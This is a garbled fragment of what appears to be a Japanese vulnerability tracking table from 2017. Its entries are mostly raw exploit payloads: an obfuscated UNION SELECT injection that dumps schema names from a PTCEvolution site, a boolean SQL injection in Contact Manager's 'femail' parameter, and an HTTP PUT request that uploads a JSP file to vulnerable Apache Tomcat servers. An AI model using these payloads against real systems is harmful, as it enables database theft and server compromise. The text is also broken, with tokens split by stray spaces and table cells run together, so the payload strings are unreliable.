/index.php?view=products&id=-4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Sele ct*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!0333 3from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!0 3333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8), (9))--PTCEvolution PTCEvolution 5.50
2017-09-15 42734 SQL Injection 易 早急対応要 - 'femail' Parameter SQL Injection 脆弱性Contact Manager 1.0 /login.php?forgot=2&femail=1%20and%201=1-- Contact Manager Contact Manager 1.0
2017-09-20 42953 File Upload 易 高
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8
- File Upload 脆弱性
PUT /1.jsp/ HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 26 <% out.println("hello");%> Apache Tomcat Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8
